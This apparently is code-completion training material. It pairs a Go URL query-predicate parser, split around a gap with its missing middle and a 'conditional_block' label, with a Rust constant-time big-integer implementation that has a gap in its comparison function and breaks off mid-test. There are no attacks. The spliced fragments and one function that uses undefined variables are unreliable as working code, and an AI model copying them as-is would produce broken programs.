parser.go | package queryme
import (
"fmt"
"errors"
"net/url"
"strconv"
"strings"
"time"
"unicode/utf8"
)
/*
predicates = predicate *("," predicate)
predicate = (not / and / or / eq / lt / le / gt / ge)
not = "not" "(" predicate ")"
and = "and" "(" predicates ")"
or = "or" "(" predicates ")"
eq = "eq" "(" field "," values ")"
lt = "lt" "(" field "," value ")"
le = "le" "(" field "," value ")"
gt = "gt" "(" field "," value ")"
ge = "ge" "(" field "," value ")"
fts = "fts" "(" field "," string ")"
values = value *("," value)
value = (null / boolean / number / string / date)
null = "null"
boolean = "true" / "false"
number = 1*(DIGIT / "." / "e" / "E" / "+" / "-")
string = "$" *(unreserved / pct-encoded)
date = 4DIGIT "-" 2DIGIT "-" 2DIGIT *1("T" 2DIGIT ":" 2DIGIT ":" 2DIGIT *1("." 3DIGIT) "Z")
fieldorders = *1(fieldorder *("," fieldorder))
fieldorder = *1"!" field
field = *(unreserved / pct-encoded)
unreserved = ALPHA / DIGIT / "-" / "." / "_" / "~"
pct-encoded = "%" HEXDIG HEXDIG
sub-delims = "!" / "$" / "&" / "'" / "(" / ")" / "*" / "+" / "," / ";" / "="
pchar = unreserved / pct-encoded / sub-delims / ":" / "@"
query = *( pchar / "/" / "?" )
*/
var (
SortOrderSeparatorExpected error = errors.New("Expected seperator ',' after sorted order.")
IdentifierExpected error = errors.New("Expected identifier.")
ValueExpected error = errors.New("Expected value.")
EndOfStringExpected error = errors.New("Expected end of string.")
StringExpected error = errors.New("Expected string.")
OperatorExpected error = errors.New("Expected operator.")
UnexpectedEndOfPredicate error = errors.New("Unexpected end of predicate.")
UnexpectedEndOfSortOrders error = errors.New("Unexpected end of sort orders.")
characters []byte
)
func init() {
characters = make([]byte, 128)
characters[int('=')] = 1
characters[int('&')] = 1
characters[int('!')] = 2
characters[int('\'')] = 2
characters[int('(')] = 2
characters[int(')')] = 2
characters[int('*')] = 2
characters[int(',')] = 2
characters[int(';')] = 2
characters[int('/')] = 2
characters[int('?')] = 2
characters[int('@')] = 2
characters[int('$')] = 3
characters[int('+')] = 3
characters[int(':')] = 3
// 'pct-encoded' characters
characters[int('%')] = 4
// 'unreserved' characters
characters[int('-')] = 5
characters[int('.')] = 5
characters[int('_')] = 5
characters[int('~')] = 5
for i := int('0'); i <= int('9'); i++ |
for i := int('a'); i <= int('z'); i++ {
characters[i] = 5
}
for i := int('A'); i <= int('Z'); i++ {
characters[i] = 5
}
}
func firstCharClass(s string) byte {
r, _ := utf8.DecodeRuneInString(s)
if r > 127 {
return 0
} else {
return characters[r]
}
}
func charClassDetector(min byte, max byte) func(r rune) bool {
return func(r rune) bool {
i := int(r)
if i > 127 {
return false
}
c := characters[i]
return c >= min && c <= max
}
}
// QueryString is a parsed query part of a URL.
type QueryString struct {
fields map[string]string
}
// NewFromRawQuery creates a new QueryString from a raw query string.
func NewFromRawQuery(rawQuery string) *QueryString {
qs := new(QueryString)
qs.fields = make(map[string]string)
for {
i := strings.IndexRune(rawQuery, '=')
if i == -1 {
break
}
name := rawQuery[:i]
rawQuery = rawQuery[i+1:]
i = strings.IndexFunc(rawQuery, charClassDetector(1, 1))
var value string
if i == -1 {
value = rawQuery
} else {
value = rawQuery[:i]
rawQuery = rawQuery[i+1:]
}
qs.fields[name] = value
if i == -1 {
break
}
}
return qs
}
// NewFromRawQuery creates a new QueryString from an existing URL object.
func NewFromURL(url *url.URL) *QueryString {
return NewFromRawQuery(url.RawQuery)
}
// Tests if specified name has been found in query string.
func (q *QueryString) Contains(name string) bool {
_, ok := q.fields[name]
return ok
}
// Returns raw query string value.
func (q *QueryString) Raw(name string) (string, bool) {
v, ok := q.fields[name]
return v, ok
}
// Predicate parses the given component of the query as a predicate, then returns it.
func (q *QueryString) Predicate(name string) (p Predicate, err error) {
defer func() {
if rec := recover(); rec != nil {
err = rec.(error)
}
}()
raw, ok := q.fields[name]
if !ok {
return nil, fmt.Errorf("field not found: %q", name)
}
p, raw = parsePredicate(raw)
if len(raw) != 0 {
p = nil
err = UnexpectedEndOfPredicate
}
return
}
// Predicate parses the given component of the query as a sort order, then returns it.
func (q *QueryString) SortOrder(name string) (os []*SortOrder, err error) {
defer func() {
if rec := recover(); rec != nil {
err = rec.(error)
}
}()
raw, ok := q.fields[name]
if !ok {
return nil, fmt.Errorf("field not found: %q", name)
}
os, raw = parseSortOrders(raw)
if len(raw) != 0 {
os = nil
err = UnexpectedEndOfSortOrders
}
return
}
func parsePredicate(s string) (p Predicate, n string) {
if len(s) == 0 {
panic(OperatorExpected)
}
var op string
op, n = parseIdentifier(s)
n = parseLiteral(n, "(")
var f string
var ps []Predicate
var vs []Value
var v Value
switch op {
case "not":
var operand Predicate
operand, n = parsePredicate(n)
p = Not{operand}
case "and":
ps, n = parsePredicates(n)
p = And(ps)
case "or":
ps, n = parsePredicates(n)
p = Or(ps)
case "eq":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
vs, n = parseValues(n)
p = Eq{Field(f), vs}
case "gt":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
v, n = parseValue(n)
p = Gt{Field(f), v}
case "ge":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
v, n = parseValue(n)
p = Ge{Field(f), v}
case "lt":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
v, n = parseValue(n)
p = Lt{Field(f), v}
case "le":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
v, n = parseValue(n)
p = Le{Field(f), v}
case "fts":
f, n = parseIdentifier(n)
n = parseLiteral(n, ",")
s, n = parseString(n)
p = Fts{Field(f), s}
default:
panic(fmt.Errorf("Invalid operator: %q", op))
}
n = parseLiteral(n, ")")
return
}
func parsePredicates(s string) (ps []Predicate, n string) {
ps = make([]Predicate, 0, 4)
if len(s) > 0 && firstCharClass(s) > 2 {
n = s
for {
var operand Predicate
operand, n = parsePredicate(n)
ps = append(ps, operand)
if len(n) > 0 && n[0] == ',' {
n = n[1:]
} else {
break
}
}
}
return
}
func ParseValues(s string) ([]Value, error) {
vs, n := parseValues(s)
if n != "" {
return vs, EndOfStringExpected
}
return vs, nil
}
func parseValues(s string) (vs []Value, n string) {
vs = make([]Value, 0, 4)
if len(s) > 0 && firstCharClass(s) > 2 {
n = s
for {
var operand interface{}
operand, n = parseValue(n)
vs = append(vs, operand)
if len(n) > 0 && n[0] == ',' {
n = n[1:]
} else {
break
}
}
}
return
}
func parseString(s string) (v string, n string) {
if len(s) == 0 || s[0] != '$' {
panic(StringExpected)
}
s = s[1:]
l := strings.IndexFunc(s, charClassDetector(1, 2))
if l == -1 {
l = len(s)
}
var err error
if v, err = url.QueryUnescape(s[:l]); err != nil {
panic(err)
}
n = s[l:]
return
}
func ParseValue(s string) (Value, error) {
v, n := parseValue(s)
if n != "" {
return v, EndOfStringExpected
}
return v, nil
}
func parseValue(s string) (v Value, n string) {
if len(s) == 0 {
panic(ValueExpected)
}
r, l := utf8.DecodeRuneInString(s)
switch(r) {
case 'n':
n = parseLiteral(s, "null")
v = nil
case 't':
n = parseLiteral(s, "true")
v = true
case 'f':
n = parseLiteral(s, "false")
v = false
case '$':
v, n = parseString(s)
default:
if l = strings.IndexFunc(s, charClassDetector(1, 2)); l == -1 {
l = len(s)
}
if (l == 10 || ((l == 20 || (l == 24 && s[19] == '.')) && s[10] == 'T' && s[13] == ':' && s[16] == ':' && s[l-1] == 'Z')) && s[4] == '-' && s[7] == '-' {
var err error
var yr, mo, dy, hr, mn, sc, ms int64 = 0, 0, 0, 0, 0, 0, 0
if yr, err = strconv.ParseInt(s[0:4], 10, 32); err != nil {
panic(err)
}
if mo, err = strconv.ParseInt(s[5:7], 10, 32); err != nil {
panic(err)
}
if dy, err = strconv.ParseInt(s[8:10], 10, 32); err != nil {
panic(err)
}
if l >= 20 {
if hr, err = strconv.ParseInt(s[11:13], 10, 32); err != nil {
panic(err)
}
if mn, err = strconv.ParseInt(s[14:16], 10, 32); err != nil {
panic(err)
}
if sc, err = strconv.ParseInt(s[17:19], 10, 32); err != nil {
panic(err)
}
if l == 24 {
if ms, err = strconv.ParseInt(s[20:23], 10, 32); err != nil {
panic(err)
}
}
}
v = time.Date(int(yr), time.Month(mo), int(dy), int(hr), int(mn), int(sc), int(ms) * 1000000, time.UTC)
} else {
if f, err := strconv.ParseFloat(s[:l], 64); err != nil {
panic(err)
} else {
v = f
}
}
n = s[l:]
}
return
}
func parseLiteral(s string, expected string) (n string) {
if len(s) < len(expected) || s[:len(expected)] != expected {
panic(fmt.Errorf("expected: %q", expected))
}
return s[len(expected):]
}
func parseSortOrders(s string) (os []*SortOrder, n string) {
os = make([]*SortOrder, 0, 4)
if len(s) > 0 {
for {
var o *SortOrder
o, s = parseSortOrder(s)
os = append(os, o)
if len(s) == 0 {
break
}
if r, l := utf8.DecodeRuneInString(s); r != ',' {
panic(SortOrderSeparatorExpected)
} else {
s = s[l:]
}
}
}
n = s
return
}
func parseSortOrder(s string) (o *SortOrder, n string) {
o = new(SortOrder)
if r, _ := utf8.DecodeRuneInString(s); r == '!' {
s = s[1:]
} else {
o.Ascending = true
}
f, n := parseIdentifier(s)
o.Field = Field(f)
return
}
func ParseIdentifier(s string) (Value, error) {
v, n := parseIdentifier(s)
if n != "" {
return v, EndOfStringExpected
}
return v, nil
}
func parseIdentifier(s string) (id string, n string) {
if len(s) == 0 {
panic(IdentifierExpected)
}
i := strings.IndexFunc(s, charClassDetector(1, 3))
if i == 0 {
panic(IdentifierExpected)
}
if i == -1 {
n = ""
} else {
n = s[i:]
s = s[:i]
}
var err error
if id, err = url.QueryUnescape(s); err != nil {
panic(err)
}
return
}
| {
characters[i] = 5
} | conditional_block |
uint.rs | use alloc::vec::Vec;
use common::ceil_div;
use core::cmp::Ord;
use core::cmp::Ordering;
use core::marker::PhantomData;
use core::ops;
use core::ops::Div;
use core::ops::Index;
use core::ops::IndexMut;
use generic_array::{arr::AddLength, ArrayLength, GenericArray};
use typenum::Quot;
use typenum::{Prod, U32};
use crate::integer::Integer;
use crate::matrix::dimension::*;
use crate::number::{One, Zero};
/*
pub trait StorageType<D: Dimension>:
Clone + AsRef<[u32]> + AsMut<[u32]> + Index<usize, Output = u32> + IndexMut<usize, Output = u32>
{
/// Allocates a new buffer with at least 'words' number of items.
fn alloc(words: usize) -> Self;
}
impl StorageType<Dynamic> for Vec<u32> {
fn alloc(words: usize) -> Self {
vec![0; words]
}
}
*/
pub(super) type BaseType = u32;
pub(super) const BASE_BITS: usize = 32;
const BASE_BYTES: usize = core::mem::size_of::<BaseType>();
const BITS_PER_BYTE: usize = 8;
/// Big unsigned integer implementation intended for security critical
/// use-cases.
///
/// Internally each instance stores a fixed size storage buffer based on the bit
/// width used to initialize the integer. All numerical operations are constant
/// time for a given storage buffer size unless otherwise specified. This means
/// that we assume that the buffer widths are publicly known and don't vary with
/// the value of the integer.
///
/// Special care must be taken to ensure that the width of integers generated by
/// operations is kept under control:
/// - Addition (a + b) will output integers with space for one extra carry bit.
/// - Multiplication (a*b) will output integers with double the space.
/// - Operations like quorem (a % b) or truncate can be used to re-contrain the
/// width of integers.
#[derive(Clone, Debug)]
pub struct SecureBigUint {
/// In little endian 32bits at a time.
/// Will be padded with
///
/// TODO: We can make this an enum to support passing in '&mut [BaseType]'
pub(super) value: Vec<BaseType>,
}
impl SecureBigUint {
/// Creates an integer from a small value that fits within a usize. The
/// buffer used to store this number will be able to store at least 'width'
/// bits.
pub fn from_usize(value: usize, width: usize) -> Self {
let mut data = vec![0; ceil_div(width, BASE_BITS)];
data[0] = value as BaseType;
Self { value: data }
}
}
impl Integer for SecureBigUint {
/// Creates an integer from little endian bytes representing the number.
///
/// The width of the integer is inferred from data.len().
/// The caller is responsible for ensuring that data.len() is a well known
/// constant.
fn from_le_bytes(data: &[u8]) -> Self {
let mut out = Self::from_usize(0, BITS_PER_BYTE * data.len());
let n = data.len() / BASE_BYTES;
for i in 0..(data.len() / BASE_BYTES) {
out.value[i] = BaseType::from_le_bytes(*array_ref![data, BASE_BYTES * i, BASE_BYTES]);
}
let rem = data.len() % BASE_BYTES;
if rem != 0 {
let mut rest = [0u8; BASE_BYTES];
rest[0..rem].copy_from_slice(&data[(data.len() - rem)..]);
out.value[n] = BaseType::from_le_bytes(rest);
}
out
}
/// Converts the integer to little endian bytes.
///
/// NOTE: This may have zero significant padding depending on the internal
/// representation.
fn to_le_bytes(&self) -> Vec<u8> {
let mut data = vec![];
data.reserve_exact(self.value.len() * BASE_BYTES);
for v in &self.value {
data.extend_from_slice(&v.to_le_bytes());
}
data
}
fn from_be_bytes(data: &[u8]) -> Self {
let mut out = Self::from_usize(0, BITS_PER_BYTE * data.len());
let n = data.len() / BASE_BYTES;
for i in 0..(data.len() / BASE_BYTES) {
out.value[i] = BaseType::from_be_bytes(*array_ref![
data,
data.len() - (BASE_BYTES * (i + 1)),
BASE_BYTES
]);
}
let rem = data.len() % BASE_BYTES;
if rem != 0 {
let mut rest = [0u8; BASE_BYTES];
rest[(BASE_BYTES - rem)..].copy_from_slice(&data[0..rem]);
out.value[n] = BaseType::from_be_bytes(rest);
}
out
}
fn to_be_bytes(&self) -> Vec<u8> {
let mut data = vec![];
data.reserve_exact(self.value.len() * 4);
for v in self.value.iter().rev() {
data.extend_from_slice(&v.to_be_bytes());
}
data
}
/// Computes and returns 'self + rhs'. The output buffer will be 1 bit
/// larger than the inputs to accomadate possible overflow.
fn add(&self, rhs: &Self) -> Self {
let mut out = Self::from_usize(0, core::cmp::max(self.bit_width(), rhs.bit_width()) + 1);
self.add_to(rhs, &mut out);
out
}
/// Computes 'output = self + rhs'. It is the user's responsibility to
/// ensure that the
fn add_to(&self, rhs: &Self, output: &mut Self) {
assert!(output.value.len() >= self.value.len());
assert!(output.value.len() >= rhs.value.len());
let mut carry = 0;
// TODO: Always loop through max(self, rhs, output) length so we know for sure
// that all carries are handled.
let n = output.value.len();
for i in 0..n {
let a = self.value.get(i).cloned().unwrap_or(0);
let b = rhs.value.get(i).cloned().unwrap_or(0);
let v = (a as u64) + (b as u64) + carry;
output.value[i] = v as BaseType;
carry = v >> 32;
}
assert_eq!(carry, 0);
}
/// Computes 'self += rhs'.
fn add_assign(&mut self, rhs: &Self) {
let mut carry = 0;
let n = self.value.len();
for i in 0..n {
let v = (self.value[i] as u64) + (rhs.value[i] as u64) + carry;
self.value[i] = v as u32;
carry = v >> 32;
}
assert_eq!(carry, 0);
}
fn sub(&self, rhs: &Self) -> Self {
let mut out = self.clone();
out.sub_assign(rhs);
out
}
/// It would be useful to have a conditional form of this that adds like
/// subtraction by zero.
fn sub_assign(&mut self, rhs: &Self) {
assert!(!self.overflowing_sub_assign(rhs));
}
fn mul(&self, rhs: &Self) -> Self {
let mut out = Self::from_usize(0, self.bit_width() + rhs.bit_width());
self.mul_to(rhs, &mut out);
out
}
/// O(n^2) multiplication. Assumes that u64*u64 multiplication is always
/// constant time.
///
/// 'out' must be twice the size of
fn mul_to(&self, rhs: &Self, out: &mut Self) {
out.assign_zero();
let mut overflowed = false;
for i in 0..self.value.len() {
let mut carry = 0;
for j in 0..rhs.value.len() {
// TODO: Ensure this uses the UMAAL instruction on ARM
let tmp = ((self.value[i] as u64) * (rhs.value[j] as u64))
+ (out.value[i + j] as u64)
+ carry;
carry = tmp >> BASE_BITS;
out.value[i + j] = tmp as BaseType;
}
// assert!(carry <= u32::max_value() as u64);
if i + rhs.value.len() < out.value.len() {
out.value[i + rhs.value.len()] = carry as BaseType;
} else {
overflowed |= carry != 0;
}
}
assert!(!overflowed);
}
fn bit(&self, i: usize) -> usize {
((self.value[i / BASE_BITS] >> (i % BASE_BITS)) & 0b01) as usize
}
fn set_bit(&mut self, i: usize, v: usize) {
assert!(v == 0 || v == 1);
let ii = i / BASE_BITS;
let shift = i % BASE_BITS;
let mask = !(1 << shift);
self.value[ii] = (self.value[ii] & mask) | ((v as BaseType) << shift);
}
/// Computes the quotient and remainder of 'self / rhs'.
///
/// Any mixture of input bit_widths is supported.
/// Internally this uses binary long division.
///
/// NOTE: This is very slow and should be avoided if possible.
///
/// Returns a tuple of '(self / rhs, self % rhs)' where the quotient is the
/// same width as 'self' and the remainder is the same width as 'rhs'.
fn quorem(&self, rhs: &Self) -> (Self, Self) {
let mut q = Self::from_usize(0, self.bit_width()); // Range is [0, Self]
let mut r = Self::from_usize(0, rhs.bit_width()); // Range is [0, rhs).
// TODO: Implement a bit iterator so set_bit requires less work.
for i in (0..self.bit_width()).rev() {
let carry = r.shl();
r.set_bit(0, self.bit(i));
let mut next_r = Self::from_usize(0, rhs.bit_width());
// If there is a carry, then we know that r might be > rhs when the shl also has
// a carry.
let carry2 = r.overflowing_sub_to(rhs, &mut next_r);
let subtract = (carry != 0) == carry2;
next_r.copy_if(subtract, &mut r);
q.set_bit(i, if subtract { 1 } else { 0 });
}
(q, r)
}
fn value_bits(&self) -> usize {
for i in (0..self.value.len()).rev() {
let zeros = self.value[i].leading_zeros() as usize;
if zeros == BASE_BITS {
continue;
}
return (i * BASE_BITS) + (BASE_BITS - zeros);
}
0
}
fn bit_width(&self) -> usize {
self.value.len() * BASE_BITS
}
}
impl SecureBigUint {
pub fn byte_width(&self) -> usize {
self.value.len() * BASE_BYTES
}
/// Multiplies two numbers and adds their result to the out number.
/// out += self*rhs
pub(super) fn add_mul_to(&self, rhs: &Self, out: &mut Self) {
let a = &self.value[..];
let b = &rhs.value[..];
for i in 0..a.len() {
let mut carry = 0;
for j in 0..b.len() {
// TODO: Ensure this uses the UMAAL instruction on ARM
let tmp = ((a[i] as u64) * (b[j] as u64)) + (out.value[i + j] as u64) + carry;
carry = tmp >> BASE_BITS;
out.value[i + j] = tmp as u32;
}
for k in (i + b.len())..out.value.len() {
let tmp = (out.value[k] as u64) + carry;
carry = tmp >> BASE_BITS;
out.value[k] = tmp as u32;
}
}
}
/// Copies 'self' to 'out' if should_copy is true. In all cases, this takes
/// a constant amount of time to execute.
///
/// NOTE: 'self' and 'out' must have the same bit_width().
#[inline(never)]
pub fn copy_if(&self, should_copy: bool, out: &mut Self) {
assert_eq!(self.value.len(), out.value.len());
// Will be 0b111...111 if should_copy else 0.
let self_mask = (!(should_copy as BaseType)).wrapping_add(1);
let out_mask = !self_mask;
for (self_v, out_v) in self.value.iter().zip(out.value.iter_mut()) {
*out_v = (*self_v & self_mask).wrapping_add(*out_v & out_mask);
}
}
/// Swaps the contents of 'self' and 'other' if 'should_swap' is true.
///
/// The actual values of both integers are swapped rather than swapping any
/// internal memory pointers so that 'should_swap' can not be inferred from
/// the memory locations of the final integers.
///
/// At a given integer bit_width, this should always take the same amount of
/// CPU cycles to execute.
#[inline(never)]
pub fn swap_if(&mut self, other: &mut Self, should_swap: bool) {
assert_eq!(self.value.len(), other.value.len());
// Will be 0b111...111 if should_swap else 0.
let mask = (!(should_swap as BaseType)).wrapping_add(1);
for (self_v, other_v) in self.value.iter_mut().zip(other.value.iter_mut()) {
// Will be 0 if we don't want to swap.
let filter = mask & (*self_v ^ *other_v);
*self_v ^= filter;
*other_v ^= filter;
}
}
/// In-place reverses all the order of all bits in this integer.
pub fn reverse_bits(&mut self) {
let mid = (self.value.len() + 1) / 2;
for i in 0..mid {
let j = self.value.len() - 1 - i;
// Swap if we are not at the middle limb (only relevant if we have an odd number
// of limbs).
if i != j {
self.value.swap(i, j);
self.value[j] = self.value[j].reverse_bits();
}
self.value[i] = self.value[i].reverse_bits();
}
}
/// Performs 'self ^= rhs' only if 'should_apply' is true.
pub fn xor_assign_if(&mut self, should_apply: bool, rhs: &Self) {
assert_eq!(self.value.len(), rhs.value.len());
// Will be 0b111...111 if should_apply else 0.
let mask = (!(should_apply as BaseType)).wrapping_add(1);
for i in 0..self.value.len() {
self.value[i] ^= rhs.value[i] & mask;
}
}
pub fn discard(&mut self, bit_width: usize) {
let n = ceil_div(bit_width, BASE_BITS);
self.value.truncate(n);
}
///
pub fn truncate(&mut self, bit_width: usize) {
let n = ceil_div(bit_width, BASE_BITS);
// TODO: Also zero out any high bits
for i in n..self.value.len() {
assert_eq!(self.value[i], 0);
}
self.value.truncate(n);
}
/// Computes 2^n more efficiently than using pow().
/// Only supports exponents smaller than u32.
/// TODO: Just take as input a u32 directly.
pub fn exp2(n: u32, bit_width: usize) -> Self {
let mut out = Self::from_usize(0, bit_width);
out.set_bit(n as usize, 1);
out
}
pub fn is_zero(&self) -> bool {
let mut is = true;
for v in &self.value {
is &= *v == 0;
}
is
}
/// TODO: Improve the constant time behavior of this.
/// It would be useful to have a conditional form of this that adds like
/// subtraction by zero.
pub(super) fn overflowing_sub_assign(&mut self, rhs: &Self) -> bool {
let mut carry = 0;
let n = self.value.len();
for i in 0..n {
// rhs is allowed to be narrower than self
let r_i = if i < rhs.value.len() { rhs.value[i] } else { 0 };
// TODO: Try to use overflowing_sub instead (that way we don't need to go to
// 64bits)
let v = (self.value[i] as i64) - (r_i as i64) + carry;
if v < 0 {
self.value[i] = (v + (u32::max_value() as i64) + 1) as u32;
carry = -1;
} else {
self.value[i] = v as u32;
carry = 0;
}
}
carry != 0
}
pub(super) fn overflowing_sub_to(&self, rhs: &Self, out: &mut Self) -> bool {
let mut carry = 0;
let n = out.value.len();
for i in 0..n {
let a = self.value.get(i).cloned().unwrap_or(0);
let b = rhs.value.get(i).cloned().unwrap_or(0);
// TODO: Try to use overflowing_sub instead (that way we don't need to go to
// 64bits)
let v = (a as i64) - (b as i64) + carry;
if v < 0 {
out.value[i] = (v + (u32::max_value() as i64) + 1) as u32;
carry = -1;
} else {
out.value[i] = v as u32;
carry = 0;
}
}
carry != 0
}
/// Performs modular reduction using up to one subtraction of the modulus
/// from the value.
///
/// Will panic if 'self' was >= 2*modulus
pub fn reduce_once(&mut self, modulus: &Self) {
let mut reduced = Self::from_usize(0, self.bit_width());
let overflow = self.overflowing_sub_to(modulus, &mut reduced);
reduced.copy_if(!overflow, self);
self.truncate(modulus.bit_width());
}
#[must_use]
pub fn shl(&mut self) -> BaseType {
let mut carry = 0;
for v in self.value.iter_mut() {
let (new_v, _) = v.overflowing_shl(1);
let new_carry = *v >> 31;
*v = new_v | carry;
carry = new_carry;
}
carry
}
pub fn shr(&mut self) {
let mut carry = 0;
for v in self.value.iter_mut().rev() {
let (new_v, _) = v.overflowing_shr(1);
let new_carry = *v & 1;
*v = new_v | (carry << 31);
carry = new_carry;
}
}
/// Computes 'self >>= n'
/// NOTE: We assume that 'n' is a publicly known constant.
pub fn shr_n(&mut self, n: usize) {
let byte_shift = n / BASE_BITS;
let carry_size = n % BASE_BITS;
let carry_mask = ((1 as BaseType) << carry_size).wrapping_sub(1);
for i in 0..self.value.len() {
let v = self.value[i];
self.value[i] = 0;
if i < byte_shift {
continue;
}
let j = i - byte_shift;
self.value[j] = v >> carry_size;
if carry_size != 0 && j > 0 {
let carry = v & carry_mask;
self.value[j - 1] |= carry << (BASE_BITS - carry_size);
}
}
}
/// Computes self >>= BASE_BITS.
pub(super) fn shr_base(&mut self) {
assert_eq!(self.value[0], 0);
for j in 1..self.value.len() {
self.value[j - 1] = self.value[j];
}
let k = self.value.len();
self.value[k - 1] = 0;
}
pub fn and_assign(&mut self, rhs: &Self) {
for i in 0..self.value.len() {
self.value[i] &= rhs.value[i];
}
}
/// Efficienctly (in O(1) time) computes 'self % 2^32'
pub fn mod_word(&self) -> u32 {
if self.value.len() == 0 {
0
} else {
self.value[0]
}
}
// TODO: Need a version of this using pmull in aarch64 (vmull_p64)
/// Interprates this integer and 'rhs' as polynomials over GF(2^n) and
/// multiplies them into 'out'.
///
/// Operations in this field:
/// - Addition is XOR
/// - Multiplication is AND
#[cfg(all(target_arch = "x86_64", target_feature = "pclmulqdq"))]
pub fn carryless_mul_to(&self, rhs: &Self, out: &mut Self) {
use crate::intrinsics::*;
use core::arch::x86_64::_mm_clmulepi64_si128;
assert!(out.bit_width() >= self.bit_width() + rhs.bit_width() - 1);
out.assign_zero();
for i in 0..self.value.len() {
let a = u64_to_m128i(self.value[i] as u64);
for j in 0..rhs.value.len() {
let b = u64_to_m128i(rhs.value[j] as u64);
let r = u64_from_m128i(unsafe { _mm_clmulepi64_si128(a, b, 0) });
let rl = r as u32;
let rh = (r >> 32) as u32;
// Add to output
out.value[i + j] ^= rl;
out.value[i + j + 1] ^= rh;
}
}
}
// TODO: Finish making this constant time and correct.
#[cfg(not(all(target_arch = "x86_64", target_feature = "pclmulqdq")))]
pub fn carryless_mul_to(&self, rhs: &Self, out: &mut Self) {
assert!(out.bit_width() >= self.bit_width() + rhs.bit_width() - 1);
out.assign_zero();
for i in 0..b.value_bits() {
out.xor_assign_if(b.bit(i) == 1, &a);
a.shl();
}
}
// TODO: Move to a shared utility.
pub fn to_string_radix(&self, radix: u32) -> alloc::string::String {
// TODO: These should be global constants (as well as one)
let zero = Self::from_usize(0, self.bit_width());
let div = Self::from_usize(radix as usize, 32);
let mut s = alloc::string::String::new();
let mut tmp = self.clone();
while tmp > zero {
// TODO: We can divide by a larger power of 10 to make this more efficient.
let (q, r) = tmp.quorem(&div);
tmp = q;
// TODO: Very inefficient
s.insert(
0,
core::char::from_digit(r.value.first().cloned().unwrap_or(0), radix).unwrap(),
);
}
if s.len() == 0 {
s.push('0');
}
s
}
/// Resets the value of the integer to 0.
pub fn assign_zero(&mut self) {
for v in self.value.iter_mut() {
*v = 0;
}
}
/// In-place increases the size
pub fn extend(&mut self, bit_width: usize) {
let new_len = ceil_div(bit_width, BASE_BITS);
assert!(new_len >= self.value.len());
self.value.resize(new_len, 0);
}
pub fn from_str(s: &str, bit_width: usize) -> common::errors::Result<Self> {
let ten = SecureBigUint::from_usize(10, 32);
let mut out = Self::from_usize(0, bit_width);
for c in s.chars() {
let digit = c
.to_digit(10)
.ok_or(common::errors::err_msg("Invalid digit"))?;
let tmp = out.clone();
ten.mul_to(&tmp, &mut out);
out += SecureBigUint::from_usize(digit as usize, bit_width);
// out = (&out * &ten) + &(digit as usize).into();
}
Ok(out)
}
}
impl core::fmt::Display for SecureBigUint {
fn fmt(&self, f: &mut core::fmt::Formatter<'_>) -> core::fmt::Result {
write!(f, "{}", self.to_string_radix(10))
}
}
impl Ord for SecureBigUint {
fn cmp(&self, other: &Self) -> Ordering {
let mut less = 0;
let mut greater = 0;
let n = core::cmp::max(self.value.len(), other.value.len());
for i in (0..n).rev() {
let mask = !(less | greater);
let a = self.value.get(i).cloned().unwrap_or(0);
let b = other.value.get(i).cloned().unwrap_or(0);
if a < b {
less |= mask & 1;
} else if a > b {
greater |= mask & 1;
}
}
let cmp = (less << 1) | greater;
let mut out = Ordering::Equal;
// Exactly one of these if statements should always be triggered.
if cmp == 0b10 {
out = Ordering::Less;
}
if cmp == 0b01 {
out = Ordering::Greater;
}
if cmp == 0b00 |
out
}
}
impl PartialEq for SecureBigUint {
fn eq(&self, other: &Self) -> bool {
self.cmp(other) == Ordering::Equal
}
}
impl Eq for SecureBigUint {}
impl PartialOrd for SecureBigUint {
fn partial_cmp(&self, other: &Self) -> Option<Ordering> {
Some(self.cmp(other))
}
}
impl_op_ex!(+= |lhs: &mut SecureBigUint, rhs: &SecureBigUint| {
Integer::add_assign(lhs, rhs)
});
impl_op_commutative!(+ |lhs: SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
// NOTE: Does not use add_into to avoid risking an overflow.
Integer::add(&lhs, rhs)
});
impl_op!(+ |lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
Integer::add(lhs, rhs)
});
impl_op_ex!(-= |lhs: &mut SecureBigUint, rhs: &SecureBigUint| {
Integer::sub_assign(lhs, rhs)
});
impl_op_ex!(-|lhs: SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint { lhs.sub_into(rhs) });
impl_op!(-|lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint { Integer::sub(lhs, rhs) });
impl_op_ex!(
*|lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint { Integer::mul(lhs, rhs) }
);
impl_op_ex!(/ |lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
let (q, _) = lhs.quorem(rhs);
q
});
impl_op!(% |lhs: SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
let (_, r) = lhs.quorem(rhs);
r
});
impl_op!(% |lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
let (_, r) = lhs.quorem(rhs);
r
});
impl_op_ex!(^= |lhs: &mut SecureBigUint, rhs: &SecureBigUint| {
assert_eq!(lhs.value.len(), rhs.value.len());
for (lhs_value, rhs_value) in lhs.value.iter_mut().zip(rhs.value.iter()) {
*lhs_value ^= *rhs_value;
}
});
impl_op_ex!(^ |lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
assert_eq!(lhs.value.len(), rhs.value.len());
let mut out = SecureBigUint::from_usize(0, lhs.bit_width());
for i in 0..out.value.len() {
out.value[i] = lhs.value[i] ^ rhs.value[i];
}
out
});
#[cfg(test)]
mod tests {
use super::*;
use core::str::FromStr;
#[test]
fn secure_biguint_test() {
// TODO: Check multiplication in x*0 and x*1 cases
let seven = SecureBigUint::from_usize(7, 64);
let one_hundred = SecureBigUint::from_usize(100, 64);
assert!(one_hundred > seven);
assert!(seven < one_hundred);
assert!(one_hundred == one_hundred);
assert!(seven == seven);
let mut seven_hundred = SecureBigUint::from_usize(0, 64);
seven.mul_to(&one_hundred, &mut seven_hundred);
assert!(seven_hundred == SecureBigUint::from_usize(700, 64));
let x = SecureBigUint::from_le_bytes(&[0xff, 0xff, 0xff, 0xff]);
let mut temp = SecureBigUint::from_usize(0, 64);
x.mul_to(&x, &mut temp);
assert_eq!(
&temp.to_le_bytes(),
&(core::u32::MAX as u64).pow(2).to_le_bytes()
);
